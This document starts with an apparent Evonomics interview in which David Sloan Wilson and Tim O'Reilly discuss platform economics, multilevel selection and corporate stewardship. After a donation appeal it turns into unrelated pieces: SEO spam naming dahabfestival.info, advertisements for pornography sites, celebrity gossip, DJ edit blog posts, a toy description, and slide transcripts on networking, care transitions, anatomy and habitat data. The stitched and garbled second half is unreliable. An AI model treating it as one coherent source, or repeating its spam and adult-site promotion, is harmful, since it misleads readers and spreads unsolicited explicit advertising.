Similarly, if Google directly provides more and more of the services that were once provided by other websites, they will eventually impoverish the environment on which their core search engine depends, much as Microsoft impoverished the PC software development ecosystem 20 years earlier, forcing software developers to seek opportunity elsewhere. In research into Google’s financial statements since I finished the book, I’ve determined that this process is already well underway. In 2004, Google received 51.5% of its revenue from advertising on its own core properties at that time, only Google search, and 49.5% from advertising on 3rd party websites. Today, 82% of their revenue comes from Google’s own product offerings. But Google has also done some things to radically expand the market opportunity, for example by open sourcing Android. While Microsoft tried to preserve the dominance they’d achieved on the fitness peak of the personal computer by controlling the web, Google seems to have bridged successfully from the web to the new fitness peak of mobile with a strategy of generosity. There’s a lot to learn there.
I believe that this analysis of tech platforms also has parallels in the broader economy. My conclusions are very similar to those of Kate Raworth in her book Doughnut Economics: the job of economics (including corporate economics as a guide to business strategy) is not to keep growth going up and to the right forever, but to keep a company and the ecosystem on which it depends in balance. Kate’s Doughnut Economics is very similar to the idea of the Goldilocks zone for planets that support life.
I also tie this idea very much to Alvin Roth’s ideas of marketplace design, and to my own idea of governments as the managers of platforms in the same way that tech companies are. Markets are designed by humans, and they have rules that shape them. Those who say “government should stay out and let the market decide” fail to understand how many rules there are– tax policy, for example – that already shape the market and its incentives.” If we don’t design the platform rules correctly, it will fail over the long run.
The title of Al Roth’s book is Who Gets What – and Why, and that, it seems to me, ought to be the central question of economics. Can we understand better how to build systems that reward the right behaviors? For so long, we didn’t have the tools to do so, but in the age of AI and big data, we are getting better and better at it. Think about Google search – 3 billion queries a day from a billion humans in an information marketplace whose rules are not at all natural, but are designed and managed, quite successfully, by a team of programmers and economists in Mountain View, California, enabling a symphony of independent human activity. Google has effectively built an “invisible hand.” This is not something built once and turned loose. It is the product of active management, with algorithms that require constant updating to respond to new information, including attacks on the system’s integrity by those trying to exploit its flaws. It is a kind of managed evolution.
Unfortunately, while Google has succeeded in this effort for the past twenty years, their failure to understand that they are not just the masters of the marketplace they have created, but a participant in it, and that they need to act as stewards for the whole, not just for their own advantage, means that the system is starting to break down.
DSW: Taking MLS theory seriously leads to a radical conclusion: policies must be formulated with the welfare of the whole earth in mind. I define policy broadly as any deliberate plan of action to achieve a given objective. Hence, the objectives of a company such as Amazon, Google, or Facebook count as policies, as much as governmental policies. In a sense, the statement that policies must have the welfare of the whole earth in mind isn’t new, because many people have a whole-earth ethic that they justify in a diversity of ways. Even profit-maximizing corporations can have a whole-earth ethic and are merely misled by the “Greed is Good” worldview into thinking that profit maximization in free markets is the way to make the world a better place. What’s new is for this simplistic worldview to be so authoritatively rejected by MLS theory. As I was reading your book, the phrase “The Customer is the Whole Earth” occurred to me as a way to convey to a business-minded person, who already understands the necessity of pleasing the customer, the need to adopt a whole-earth ethic to avoid becoming part of the problem. Is there any hope of getting corporations, large or small, to embrace this concept?
TO’R: I love “The customer is the whole earth,” but I think that there’s a much more proximate version of that idea, which was expressed beautifully by Paul Cohen, Dean of the School of Information Science put it at a recent meeting on AI at the National Academies where we were both speaking, “The opportunity for AI is to help humans model and manage complex interacting systems.” I put that together immediately in my mind with marketplace design, and the observation in Marjorie Kelly’s wonderful 2001 book The Divine Right of Capital, that the Profit and Loss statements used to guide our businesses have embedded in them a bad assumption. That is, the proper way to think about a P&L is:
That is, all of the profit is allocated to capital, regardless of the value of it as an input. Following Paul Cohen’s formulation, that we need to model complex interacting systems, we should be trying to understand the value of the various inputs to the system, and rewarding them in an optimum proportion, keeping long term sustainability in mind.
Instead, we treat materials and labor as costs – and not only costs, but as resources to be exploited – while only capital is treated as a primary source of value. In so many cases, it is the smallest source of value.
Marjorie’s formulation is of course another way of framing the famous “triple bottom line.” I’d like to go further than that and say that what we are trying to do is to “model and manage complex interacting systems.” It’s incredibly exciting to me that AI and big data algorithms are starting to give us laboratories for doing just that.
I’m really fascinated by work like that of Carla Gomes’ Institute for Computational Sustainability, which uses data to do complex problem solving over not just economic but also environmental and human values. For example, they are helping the Brazilian power company to optimize which tributaries of the Amazon they dam, and helping the California water authority time releases of water to the California rice fields to coincide with the arrival of migrating birds. It turns out that doing so is good for both the birds and the rice farmers.
DSW: Pointing out the necessity of a whole-earth ethic isn’t helpful without a practical plan for putting it into action. We know that many approaches will not work. Laissez faire won’t work. Centralized planning won’t work either because there will always be unforeseen consequences in a complex world. And we can’t expect the desire for global welfare to override concern for the welfare of lower-level units such as nation, corporation, various social identities, and good old-fashioned self-interest. It must be a matter of aligning lower-level interests with higher-level interests. Fortunately, there is a middle path between laissez-faire and centralized planning, which is a managed cultural evolutionary process, similar to the artificial selection of plants and animals, except in this case it is the artificial selection of social systems. This requires: 1) a well-defined target of selection; 2) monitoring planned and unplanned variation; and 3) replicating best practices, realizing that the details of their implementation are likely to be sensitive to context. My book covers this ground in more detail, but the most important point to make here is that these adaptable social systems already exist to an extent. Whenever you find a cultural system that is working well, it is probably because the system has converged upon the elements outlined above—often without knowing it. In sense, natural cultural evolution has resulted in social systems that have incorporated artificial cultural evolution into their organization. One example that we both cite is the Toyota Corporation and its famous “andon” cords that are pulled whenever there is an inefficiency on the assembly line, triggering a swarm of activity to solve the problem (p. 117 of your book). Another example that we both cite is the military social organization developed by General Stanley McChrystal to fight Al Qaeda in Afghanistan and Iraq, described in his book Team of Teams. Something that I learned from your book is that Jeff Bezos has taken artificial cultural evolution to new heights at Amazon, especially with the help of artificial intelligence algorithms. Could you share this example with our readers?
TO’R: The main point I was making in the book by telling the story of how Amazon applied Toyota’s “Andon Cord” model, by which any worker can stop the assembly line and summon immediate management attention, is the way that Amazon has built an organization that isn’t top down in the traditional way, but one in which small groups, working independently, communicate by clearly defined signals. While each group has its own fitness function, which it is expected to relentlessly optimize, these functions can conflict; the fitness function of any group may be checked by that of another. The art of management is to shape these functions so that they drive the entire company in the direction it wants to go, which represents an overall fitness function for the organization. This, as it turns out, is also how modern micro-services architectures work in software, and how practices like DevOps (the marriage of software development and service operations) weave an organizational hybrid of software and humans into a coherent whole.
DSW: Open-source software development and other open-source processes are outstanding examples of “artificial cultural selection”. There is a clear target of selection (the development of the software) and a vibrant community providing the variation, in large part motivated by non-monetary incentives. In your book, you provide examples in which leviathan corporations such as Microsoft attempt to capture the market for their own profits, resulting in a loss of creativity and inferior products. Either that’s the way it ends up (a dysfunctional outcome) or the open-source community flows around and ultimately outcompetes the proprietary corporations. For me, this is an excellent example of lower-level selection (a leviathan corporation attempting to maximize its profits) becoming part of the problem, not part of the solution, at larger scales. Is that how you see it?
TO’R: Absolutely. Innovation comes when the barriers to entry are low, and innovation can come from anywhere, and can be freely adopted on the basis of its superior fitness to the task at hand. By contrast, when companies become established, they often set rules and strategies that are counter-productive. For example, as the Internet and open source software led to a combinatorial explosion of innovation, Microsoft had what insiders called “the strategy tax,” which was that all roads had to lead back to the dominance of the Windows operating system. This led Microsoft to miss much of the Internet opportunity.
DSW: Yet another central insight of MLS theory is that we evolved to function in the context of small cooperative groups, which need to remain the “cells” of large-scale “multicellular” society. This is the theme of Robert Putnam’s famous book Bowling Alone, but MLS theory adds much more scientific support—so much that it challenges the very concept of methodological individualism (go here for more). Small groups also feature importantly in your book; for example, the “two pizza teams” of Amazon as essential units of its adaptability (p 113), and Mark Zuckerberg’s hope that Facebook can contribute to vibrant online and offline groups (p 218). What is your own take on the importance of small groups?
TO’R: The paradox seems to be that you need both small groups, where the innovation happens, and conditions that allow the innovations from those small groups to spread rapidly. Most open source projects are the product of a few key individuals working together on a common problem. In many cases, there are many competing groups trying to solve variations of the same problem. (There are dozens of overlapping Javascript web frameworks for instance.) The most successful open source projects have had what I call “an architecture of participation,” which allows multiple small projects to come together into a larger whole. For example the Unix (Linux) operating system has a communication-oriented architecture, in which all programs follow the same rules, and so can be developed independently. The internet and the world wide web work the same way, which allows for independent developments that are still compatible. The most successful open source projects are not monolithic; instead, they do one thing well, and cooperate as part of a kind of “web of life.”
Regarding small groups, I can’t help but think of Freeman Dyson’s marvelous review of Geoffrey West’s book Scale, which is an encomium to the benefits of scale, particularly with regard to cities. Freeman began his review with a little sidelight about genetic drift, which he brought back as a profound counterargument later in the review, arguing that drift is greater in isolated populations, which is why many of our civilization-changing advances seem to happen by magic in a small area – ancient Athens, Renaissance Florence, or Silicon Valley – and then spread from there.
It seems to me that we need both isolation and connectivity to prosper, which is why I do worry a bit about the homogenization of some aspects of modern society. But it seems that the human subconscious knows the need for distance, and so groups are always fragmenting, even within the frame of a single global culture. The culture of the future may cleave along axes very different than the ones that were shaped by climate and geography in the early days of the human era.
DSW: Earlier, I said that the conventional view of the invisible hand (that the pursuit of lower-level self-interest robustly benefits the higher-level common good) is dead, but that MLS theory justifies a new, more legitimate version (go here for more). In this version, we must function in two capacities: 1) As designers of social systems (by managing the cultural evolutionary process); and 2) As participants in the social systems that we design. As participants, we need not have the welfare of the whole system in mind, but as designers we must. In short, higher-level selection is the invisible hand that winnows lower-level behaviors that function well at the system level from the much larger set of lower-level behaviors that do not. Could you elaborate on this theme, using examples such as Uber and Airbnb, which appear self-organizing but only because they have been designed that way?
TO’R: I talked earlier about the idea of market design. What’s exciting to me about tech platforms is that they are the first algorithmically managed economies, and they are getting to a scale that rivals many traditional economies in complexity. What’s more, they evolve much faster than traditional economies, which are managed by slow-moving processes developed during the 18th, 19th, and 20th centuries. They thus provide a unique laboratory for understanding how economies evolve, and in particular, how they rise and fall, and how to make them sustainable.
In the book, I try to make the case that just as tech platforms must always rewrite their rules in pursuit of their goals, so too must traditional economies. I also argue that the best platforms are dynamic and inclusive, and create opportunity for creative evolution from unexpected quarters. But when the platform owners act like peak predators, become extractive, and despoil their environment, they fail. I’m hoping to take those lessons about finding the balance between innovation and sustainability and spread them to those who shape our politics and our economic policy.
There are lots of people who are making similar arguments from economic history. I’m trying to use this “tech moment” to make them with reference to the challenges of the internet, AI, and on-demand platforms.
DSW: In general, you have an optimistic view of what the Internet Age can become, but you are also careful to acknowledge its current shortcomings and dangers. For example, the kind of gig economy represented by Uber and Lyft is not necessarily equitable in its current form—but it could if we adopted the right fitness functions and it could even give workers the strong voice that is typically associated with unions. For me, this illustrates the central logic of MLS theory that optimizing the whole system requires selecting practices with the welfare of the whole system in mind. Could you please elaborate on this theme from your own perspective?
TO’R: The optimism in my book comes not from what I believe is the most likely outcome but what I believe is possible if we follow our best impulses rather than our worst. I use as examples how we learned the lessons of World War I and after World War II, raised up our enemies rather than punishing them. (Alas, we seem to have forgotten those lessons.) I talk about how we responded to the challenges of the industrial revolution by investments in universal education. And I talk about how at their best, tech entrepreneurs work to tackle hard problems rather than seeking the shallow, short term optimizations called for by today’s financial markets.
I posit that we face a number of grand challenges – climate change, mass migrations, extreme income inequality and consequent political instability – and if we rise to those challenges, it will make us prosperous, while if we turn from them, it will destroy us. In a lot of ways, political economics is indeed evolution in action. If we rise to the challenges of our environment, if we adapt to them, we flourish; if we don’t respond appropriately, we struggle and eventually fail.
DSW: It’s rare for me to encounter such a strong convergence of views from such different starting points. Thanks for taking the time to explore our common ground in this conversation!
TO’R: I’ve really enjoyed it too. Thanks for providing such an interesting framework for this discussion.
Evonomics is free, it’s a labor of love, and it's an expense. We spend hundreds of hours and lots of dollars each month creating, curating, and promoting content that drives the next evolution of economics. If you're like us — if you think there’s a key leverage point here for making the world a better place — please consider donating. We’ll use your donation to deliver even more game-changing content, and to spread the word about that content to influential thinkers far and wide.
Tim O'Reilly is the founder and CEO of O'Reilly Media Inc. His original business plan was simply "interesting work for interesting people," and that's worked out pretty well. He publishes books, runs conferences, invests in early-stage startups, urges companies to create more value than they capture, and tries to change the world by spreading and amplifying the knowledge of innovators. Twitter: @timoreilly
Evonomics is a labor of love, it's free, and it's ad-free. We spend hundreds of hours and thousands of dollars spreading the word about The Next Evolution of Economics.
If you think that's a worthy mission, as we do—one with powerful leverage to make the world a better place—please consider offering your support.
Like most people, I have very strong opinions when it comes to tipping rates for various services that expect them. For example, I staunchly believe that 15% is completely acceptable for good restaurant service. It used to be that tipping was meant to reward and encourage your server for exemplary.
The best opinions, comments and analysis from The Telegraph. THE UNOFFICIAL WHITE STRIPES FAQ Version 6 The FAQ that USA Today calls "exhaustive" and currently the only FAQ on the White Stripes. Actually I can't say 'only' anymore theres a couple others out there but they just steal the work that I rightfully stole from others.
A list of every Word of the Year selection released by dahabfestival.info dahabfestival.info's first Word of the Year was chosen in Watch breaking news videos, viral videos and original video clips on dahabfestival.info
This page was originally a post, but I've decided to copy it here so I can add to it from time to time as you suggest new rules, or as new ones occur to me.. I eat out a lot, and I've come to see that there are a number of rules for running a restaurant that are honored in the breach more often than the reverse. NFL Blog: Shutdown Corner. Australian rugby player Jordan Mailata picking up NFL interest, visiting five teams this week.
Torrentz will always love you. Farewell. © Torrentz. A list of every Word of the Year selection released by dahabfestival.info dahabfestival.info's first Word of the Year was chosen in
We received an email about this douche-bag from A.V.(we were asked not to name this person, so we are using the same letters the U.S. Attorney did in his release), telling us how he duped her by claiming to be a highly decorated Non-Commissioned Officer in the U.S. Army. A.V. met Short through social [ ]. The best opinions, comments and analysis from The Telegraph.
Adam sits down with ‘Pre-Op Board-Op Bill,’ who used to work with Adam and Bald Bryan during the radio show days. Adam recalls several stories from that period in his life, then talks to Bill about the gay lifestyle. Adam then shares a clip from his recent Jay Leno appearance, and the guys play. dahabfestival.info is Your Hub for Free Porn Videos & Sex Movies Updated Daily. Watch HD Porn in 4K and VR Porno for Free! Download XXX Videos or Stream Free Porno!
The best opinions, comments and analysis from The Telegraph. Port Manteaux churns out silly new words when you feed it an idea or two. Enter a word (or two) above and you'll get back a bunch of portmanteaux created by jamming together words that are conceptually related to your inputs.
Watch My Girlfriend porn videos with Black Gfs, Asian Teens, Hot Babes and Naked Girls on our WatchMyGf Tube | Amateur sex videos and Porn Pics. Asshole Chords by Beck Learn to play guitar by chord and tabs and use our crd diagrams, transpose the key and more.
You have not yet voted on this site! If you have already visited the site, please help us classify the good from the bad by voting on this dahabfestival.info do not need to login to vote.
May 10, · Brooke Mueller is making a full-court press to move her twins from Denise Richards' home to Brooke's B's Sexy Sister Hennessy tell TMZ Brooke. Khalid - Khalid is a new independent El Paso musician, still in his teens. Music producers have discovered him and are flying him hither and yon to work in various professional recording studios.
Olsen Twins nude pictures and movie clips of exposed celebrities, galleries archive updated daily. Feb 19, · Brooke Mueller is desperately trying to stop a test that could show her substance abuse caused serious damage to her twin boys so claims the twins.
Brook Little. Aliases: Brooke Little, Brookie Little, Brookie Karups, Brookie G DDF, Brooke G Onlytease, Brookie Country: United . Feb 19, · Brooke Mueller is desperately trying to stop a test that could show her substance abuse caused serious damage to her twin boys so claims the twins.
Each week in 2011, the "Year of the Edit," Dollar Bin Jams and Young Robots Records will be debuting one exclusive edit for your enjoyment!
Hello DBJ-ers, back at it again this week with another edit from the private stock. This one was hopefully gonna see a wax release at some point, but it never quite worked out. That said, it's what I consider some of my best work, and it has always jumped off the party when I've dropped it. Hopefully it does the same for y'all!
I'm particularly proud of this one because it's a pretty complete composition, a remix really, a lot more in the vein of my "Any Time is Right" edit than my "I Can't Go For That."
This week, we once again return to the Bay for our Year of the Edit installment. DJ Eddy Bauer serves up an extended groove of the Main Ingredient classic "Evening of Love," where Cuba Gooding Sr tells you that, basically, he gonna get dat ass.
Here's an extended mix of Once In A Lifetime groove with a couple extra minutes of goodness. Expect to hear this and plenty of other classics at Steppin Out on Saturday.
The record gurus behind Turnaround vs. Immediate and Fish n Chips defied the rules of space & time and blended their tastes together perfectly in this new mix. Here's a little explanation from them...
Pop music since it's inception has always been a swirling, contorted amalgamation of melodic, rhythmic, and visual concepts. These concepts have routinely emerged from the combination of unlikely macro-political, economic and artistic forces that for 60-some odd years have dominated airwaves, discotheques, bedrooms and imaginations of generations of young people.
We, the brotherhood of the Turnaround Vs. Immediate & Fish 'N Chips consortium for musical synergy, believe the transatlantic mirroring between the rhythm & melody of the American metropolis, farmland & delta and the British cognition & subsequent reinterpretation of such phenomena is undoubtedly the most captivating & stimulating example of musical symbiosis to date. Dig this if you will: American music rises from the mire of the slave and the immigrant (folk & blues) and captures the imagination of young post-WWII Brits; forms bands like The Rolling Stones, The Small Faces, The Yardbirds, The Beatles. Through a complex system of virtual smoke-signals on each of the Atlantic, the music is wired back Stateside & musicians and producers on both ends up the ante, propelling virtually every genre of pop music, beginning with garage-nuggets, R&B, disco, punk-rock, alternative rock, house, and so on.
To articulate the unification of the great musical output of both of these countries, we figured it proper to conjoin two parties: one's focus on raw soul, funk & psyche (Turnaround Vs. Immediate), the others on Brit-pop, Hacienda-house, Punk-Funk & Factory Records (Fish 'N Chips). The TVI-FNC consortium has drafted a 40 minute sonic-affidavit to illustrate precisely what we're talking about...
We believe there are no coincidences that it's effortless to mix the drum breaks for Stone Roses' "Fools Gold" to Bobby Byrds' "Hot Pants, I'm Comin'" or Stereo MC's "Connected" with Jimmy Bo Horne's "Let Me Be Your Lover." These genres feed off of one another and will prove to be a veritable musical summit on February 18th - our debut is a 2-floor blow-out at Philadelphia's beacon of Bacchanalia, The Barbary (951 Frankford Avenue). Dig into this mix, turn it way up & get the weekend on your mind, we'll see you on the dance floor!
About 10 minutes into creating my "Best of Philly Disco" mix in 2009, I immediately realized that at least one, if not two sequels were necessary. In trying to represent so many facets of this prolific time in Philly's music history (and make a tasteful mix), I realized that one mix couldn't cover it all.
As an added bonus (and this week's "Year of the Edit" contribution), you can download my edit of The Spinners - I'll Be Around which appears on the mix!
Our edit this week comes all the way from the Great White North aka America's Hat aka Don Cherry and Rick Moranis listening to Justin Beiber in an Igloo aka CANADA. Our NAFTA liason on that side of the line is DJ Co-Op from Winnipeg. You may remember Co-op and his homie Hunnicutt for their whimsical series of food-themed party breaks some time back.
On Friday, February 18th Delta Phi Disco III is going down with Hunee, The Beautiful Swimmers, Robotique & The Magic Message! For info check the FB event here.
Plus Robotique's Billy W. aka Willy Berner Eyefour has a new track for you. RIP Willy Berner - looks like a savant house producer on L.I.E.S. beat Billy to the name.
Here's some disco heat from San Francisco's Sergio Fedasz & Ion The Prize. They succeeded at the delicate task of tastefully updating a classic. Now it's a perfect slow burner for warming up the crowd.
This is an official remix we did for Wiz a number of years ago when he was on Warner. Wiz left Warner before the remixes for this particular single could ever be released. With Wiz's surge in popularity, I've had some folks ask me about it in recent weeks, so here it is!
Tuff grooves galore on M//R's recent Red Light Radio appearance, including Peggy Guo, Wolf Dem, Manik, Sorcerer, Motion Graphics, Zhut Kapote and some of his own unreleased work.
An edit of a disco cover of a soft rock anthem with huge percussion and reinforced drums?!? Ticking a lot of boxes with this one...
Superprince's mix and live set from this week's Hot Mix on WKDU. Join us at the Dolphin next Friday for a little record release party.
Philly's home-grown edit kings Superprince drop some serious brotherly love in their first outing for RNT. From the uptempo bounce of 'Strong Feeling,' to the soulful boogie of 'Down on Bitter End' and 'Start Again,' to the chilled re-cut funk of 'Up Up To The Sky,' these 4 heaters are guaranteed to find a permanent home in any record bag!
Vice profiled the homie JAZ's work as a DJ, record collector and priest! Watch the 10 minute video here.
Hop aboard the disco train as we conduct you through heater after heater, including tracks from our upcoming Razor-N-Tape 12", unreleased Superprince and a mega groover from another upcoming RNT releases. Choo choo!
Extra Lovely Records somehow managed to convince occasional DBJ contributor Vincent Smaldone aka DJ Image to open his top secret vault of tapes and share a few highlights. Under piles of random reels and unlabeled floppy discs, they unearthed Love Weather Dinner Party, an experimental turntablism album in the vein of Q-Bert's Wave Twisters, Mixmaster Mike's Anti Theft Device and D-Styles' Phantazmagorea: Psychedelic scratching and distorted drums with heaping helping of forgotten pop culture references make for a far out yet very flavorful Dinner Party.
Listen to a few tracks from the album below and head over to Extra Lovely's Bandcamp to pick up a limited edition (only 50) paint splattered cassette or files.
MPC2000, Homemade Electric Organ, VCR, Sony 1/4" Reel to Reel, Dr. 202, Turntables, Vestax 07 Pro, Vintage Keyboards, 4-track recorder, Adat, SK1. All Samples from vinyl and film. This project was created without a computer.
Meet the mightiest Lalaloopsy! Dyna Might is totally fearless, she's an action star who loves wearing disguises, running at super speed and saving the day with her pink-powered goggles. She was sewn from a hero's cape on April 28th (National Superhero Day). She has a pet raccoon.
Dyna is a fair-tan skinned girl with black button eyes usually covered by a pair of white glasses/goggles/mask and bright reddish cheeks. She has yellow-green hair worn in buns with straight cut bangs and a small cowlick, and wears a peach bow on each bun.
Dyna's pet is her adorable little Raccoon who wears a mask covering his eyes, to protect his secret identity of course!
3 David Emschermann DCS Workshop – PI Heidelberg – 22/01/2007 Ethernet network status @P2 preliminary Ethernet infrastructure preliminary Ethernet infrastructure available since autumn 2006 available since autumn 2006 Ethernet backbone installed by IT, Ethernet backbone installed by IT, to be finalized by end of January 2007 to be finalized by end of January 2007 TRD Netgear switches partially installed TRD Netgear switches partially installed Ethernet cables to the SMs half finished Ethernet cables to the SMs half finished Christian detected 25% bad connections in Christian detected 25% bad connections in DCS Ethernet cables of sector 13, A-side DCS Ethernet cables of sector 13, A-side
13 David Emschermann DCS Workshop – PI Heidelberg – 22/01/2007 Summary IP addresses for TRD are defined IP addresses for TRD are defined final Ethernet network in UX25 available final Ethernet network in UX25 available end of January end of January Netgear switches are being installed Netgear switches are being installed TRD Ethernet cables need to be tested TRD Ethernet cables need to be tested
Numbers Treasure Hunt Following each question, click on the answer. If correct, the next page will load with a graphic first – these can be used to check.
Properties Use, share, or modify this drill on mathematic properties. There is too much material for a single class, so you’ll have to select for your.
1 RA I Sub-Regional Training Seminar on CLIMAT&CLIMAT TEMP Reporting Casablanca, Morocco, 20 – 22 December 2005 Status of observing programmes in RA I.
Health Care Home and Care Transitions March 15, 2013 Hosted by RARE Operations Partners: Institute for Clinical Systems Improvement, Minnesota Hospital. - ppt download
Health Care Home and Care Transitions March 15, 2013 Hosted by RARE Operations Partners: Institute for Clinical Systems Improvement, Minnesota Hospital.
Presentation on theme: "Health Care Home and Care Transitions March 15, 2013 Hosted by RARE Operations Partners: Institute for Clinical Systems Improvement, Minnesota Hospital."— Presentation transcript:
1 Health Care Home and Care Transitions March 15, 2013 Hosted by RARE Operations Partners: Institute for Clinical Systems Improvement, Minnesota Hospital Association, Stratis Health
2 Our host today will be… Kattie Bear-Pfaffendorf – Minnesota Hospital Association Kattie Bear-Pfaffendorf is a patient safety/quality specialist with Minnesota Hospital Association. She focuses or Transforming Care at the Bedside, Partnership for Patients, Readmissions, and Perinatal Safety. Kattie holds a MBA and Lean Six Sigma Green Belt. Kattie has over 7 years of experience in the clinical laboratory including; pathology, cytology, histology and microbiology.
4 Marchs Conversation… Health Care Home And Care Transitions Sharing their work: Fairview Medical Group
5 More about the presenters… Leanne Roggemann, RN, MPH, is the Director of Nursing for the Fairview Medical Group (FMG). She is the Health Care Home lead for FMG. This work includes the implementation of care coordination and partnering across the system to establish a smooth process for care transitions from the hospitals and other care settings. Leanne has worked for FMG for 26 years in many roles including the inpatient setting and the ambulatory clinic setting. Leanne Roggemann, RN, MPH
6 More about the presenters… Vicki has spent the last 12 years in care management leadership, and is currently working as the system director of care transitions for Fairview Health Services. During the past year Vicki led the implementation of a system-wide care transitions strategy focused on assuring the highest quality patient and family support experience. She has a 21 year history in case management and is recognized for program development, building cross-continuum care teams and administering patient-focused care models. Vicki is a graduate of Loyola University, New Orleans, with a MSN in Health Care Systems Management. She also holds a bachelors degree in nursing graduating from College of St Catherine, St Paul. Vicki Weber, RN, MSN, CMC
7 TITLE Health Care Home and Care Transitions Leanne Roggeman, RN, MPHVicki Weber, RN, MSN, CMC Director of NursingDirector of Care Transitions Fairview Medical GroupFairview Health Services March 15, 2013
9 TWO CONTENT Detailed components of the standards Access 24/7 access Alternative visits: telephonic, MyChart, RN MTM, behavioral health clinicians Communication/handoffs between care teams Panel Management Disease specific patient lists Reporting workbench Population management tool 9
11 TWO CONTENT Detailed components of the standards Care Planning After visit summary Disease specific action plans Complex care plans Emergency care plans 11
12 TITLE ONLY Supportive Program Components 12 Care Transitions Transition/Hand-Off Communication Summary of event Physician Summary After Visit Summary Phone call/email/face-to-face discussion Clearly telling the patient story, what occurred, and what suggested/required care interventions need to occur Results in Immediate information related to the patients hospitalization Confirmation of post-discharge needs
13 TITLE ONLY Why Focus on Care Transitions? 13 Personalized care management focused on patient-centered goals (use of HCH POC) Enhanced alignment of continuum of care management Outcomes driven Serious unmet needs resulting in poor satisfaction with care High rates of preventable readmissions 40% (4/10) in hospital beds do not need to be there (Improvement in Science Research Network)
14 TITLE ONLY Care Transitions Process 14 1)Risk Stratification – identify the patients risk level – this will determine what level of transition services a patient may need. 2)Assessment/Triage – complete a clinical and/or psycho-social assessment to determine probable post-event needs. 3)Patient Story – understand: What led to this event, What level of understanding the patient has about the event, The patients clinical/psychosocial history that impacted the event, The patients ability and willingness to work on changes to maintain care in his/her home setting, and What support the patient may need to carry out the plan.
15 TITLE ONLY Collaborative Partnerships 15 Clinics Clinic Care Coordinator role Partner with Care Transitions Specialist during the patients hospital stay Communicate transition plan to physician and health care team members Post-hospital, work with patient to make adjustments in Medical Home Care Plan Act in the role of Patient Advocate to support care needs Hospitals Care Transition Specialist role Partner with Clinic Care Coordinator on transition plan and patients continuum needs Facilitate communication among all health care providers, proactively preparing for the transition Partner with patient/family to review Medical Home Care Plan, identify new goals, prepare for transition back to primary care provider
16 TITLE ONLY Successes/Challenges 16 Identified Successes Assurance that follow-up needs will be met due to personalized hand-off with clinic/community partners Greatly improved communication between hospital and clinic Patients and families are more engaged in planning transitions Easy identification of patients who are considered high risk, resulting in improved focus on those with the highest need Identified Challenges We want to share information with non-Fairview providers More work to be done, particularly in our emergency departments Skilled nursing facility transitions need a different type of hand-off (plan of care, why is the patient coming to them, medication reconciliation, orders confirmation)
Download ppt "Health Care Home and Care Transitions March 15, 2013 Hosted by RARE Operations Partners: Institute for Clinical Systems Improvement, Minnesota Hospital."
Health Plans and Hospitals: Working Together to Prevent Readmissions - A Collaborative Approach to Transition Management July 30, 2013 Hosted by the RARE.
Capacity to Care Caregiver Awareness Campaign January 24, 2013 Hosted by RARE Operations Partners: Institute for Clinical Systems Improvement, Minnesota.
C are O f M ental, P hysical A nd S ubstance-use S yndromes Claire Neely, MD Medical Director, ICSI August 23, 2013.
Collaboration for Referral to Mayo Clinic Health System COMPASS Medical Home Inpatient/ ED Transitions RN January 2014.
2008 Johns Hopkins Bloomberg School of Public Health Setting Up a Smoking Cessation Clinic Sophia Chan PhD, MPH, RN, RSCN Department of Nursing Studies.
Directional Terms Superior and inferior – toward and away from the head, respectively Anterior and posterior – toward the front and back of the body Medial, lateral, and intermediate – toward the midline, away from the midline, and between a more medial and lateral structure
Directional Terms Proximal and distal – closer to and farther from the origin of the body Superficial and deep – toward and away from the body surface
Median Plane or Midsagittal Plane – lies exactly in the midline Parasagittal Planes – lies near the middle
Humans vary slightly in both external and internal anatomy Over 90% of all anatomical structures match textbook descriptions, but: Nerves or blood vessels may be somewhat out of place Small muscles may be missing Extreme anatomical variations are seldom seen
15 Body Cavities Dorsal cavity protects the nervous system, and is divided into two subdivisions Cranial cavity is within the skull and encases the brain Vertebral cavity runs within the vertebral column and encases the spinal cord Ventral cavity houses the internal organs (viscera), and is divided into two subdivisions: thoracic and abdominopelvic
Body Cavities The abdominopelvic cavity is separated from the superior thoracic cavity by the dome-shaped diaphragm It is composed of two subdivisions Abdominal cavity – contains the stomach, intestines, spleen, liver, and other organs Pelvic cavity – lies within the pelvis and contains the bladder, reproductive organs, and rectum
Language of Anatomy. What is this fin called? Language of Anatomy Why is the back of your hand called the dorsal surface?
Copyright © 2006 Pearson Education, Inc., publishing as Benjamin Cummings Overview of Anatomy and Physiology  Anatomy – the study of the structure of.
2 Outline Implementation of the IBIS Project NHI and its servicesNHI and its services IBIS: Why was it developed?IBIS: Why was it developed? IBIS: What is it?IBIS: What is it? IBIS: How does it work?IBIS: How does it work? IBIS: Products & OutcomesIBIS: Products & Outcomes Current proposal objectivesCurrent proposal objectives Users and data management issuesUsers and data management issues
5 Why was IBIS Developed? Lessons Learned from the Spotted Owl Listing - Interagency supported and developed - Interagency supported and developed 5 Teams – Senior Science (Overall Guidance), Species-Habitat, Management, Marine, and Data/Digital Products Goal: T o Facilitate Common Understanding For Management
13 Objectives Subbasin Planning: 1) Incorporating remaining IBIS and Subbasin data into an improved data management system; 2) Gathering & developing spatial (GIS) and non- spatial data; 3) Updating and developing wildlife- habitat maps to allow for change detection and finer assessments; 4) Developing advanced query capabilities and decision support tools to organize and understand ecosystem information at the watershed and field level; IBIS
14 Objectives Subbasin Planning, cont: 5) Coordinate with State, Federal and Tribal organizations to acquire, develop and/or collaborate on data layers pertinent to individual subbasins or ecoprovinces; 6) Coordinate with State, Federal and Tribal organizations at the subbasin- or ecoprovince-level to assist with verifying wildlife-habitat map classifications that are generated; 7) Operate and maintain IBIS (Internet access, user technical support, Web services and DBMS backups); IBIS
15 (NED) Scope of Work (section 2.4.3)...Develop a regional locator that allows monitoring information as well as other ancillary data sets to be recorded within a subbasin or watershed
16 IBIS ObjectivesNED: 1) Develop advanced query capabilities & decision support tools including an interactive mapping and visualization application (ELVIS); 2) Develop performance tools like field applications that incorporate data standards, field protocols and GPS (VEMA); and 3) Keep the IBIS DBMS and GIS layers updated with the help of an online peer-review system
24 HABITAT STATUS Herbaceous Wetlands Mesic Riparian - Wetlands Montane Coniferous Wetlands Above habitat types are not well represented because of scale
A forum for coordinating state, federal, and tribal aquatic monitoring programs in the Pacific Northwest Pacific Northwest Aquatic Monitoring Partnership.
Okanogan Sub-basin Water Strategy and Pilot Projects (Proposal No ) Sponsored by: The Colville Confederated Tribes Presented by: Bob Anderson Golder.
Ecosystem Diagnosis and Treatment in the Columbia Cascade Province Project Goal: The Columbia Cascade Province will have an implementation strategy that.
A forum for coordinating state, federal, and tribal watershed and salmon monitoring programs in the Pacific Northwest Pacific Northwest Aquatic Monitoring.
